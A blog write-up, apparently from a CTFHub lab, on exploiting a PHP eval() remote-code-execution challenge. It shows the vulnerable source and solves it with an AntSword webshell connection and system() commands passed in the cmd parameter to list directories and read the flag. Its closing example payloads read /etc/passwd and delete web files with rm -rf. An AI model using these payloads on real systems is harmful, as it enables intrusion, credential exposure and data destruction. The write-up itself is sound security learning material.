CTFHub | eval执行

 0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

eval执行:

        (无)        

网页显示内容

        

        

0x02 解题过程

0x1 方法一: 使用蚁剑连接 

检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else 。

<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

        

使用蚁剑连接 cmd 参数试试,测试连接发现可以成功连接,说明此题存在 eval 执行

        

检查目录列表发现关于 flag 的文件

        

检查文件内容发现此题 flag

        

0x2 方法二: 网页检查文件 

根据网页代码的提示,可以先把查看网页根目录文件的命令赋值给 cmd 然后执行

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("ls");

        

继续检查上一级文件夹,这里发现一个flag_9195的文件

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("ls /");

        

继续传参给cmd命令检查flag_9195的文件,发现此题flag

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("cat /flag_9195");

        

        

0x03 eval执行

        eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。

        

例如:

1.访问服务器敏感信息

?cmd=system('cat /etc/passwd')

2.删除网页文件

?cmd=system("rm -rf /xx/xx");

         

        

0x04 参考文献

[1].Ho1aAs. CTFHub_技能树_Web之RCE——“eval执行”、“命令注入”[EB/OL]. [2023-04-19]. https://blog.csdn.net/Xxy605/article/details/107548841.

        

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值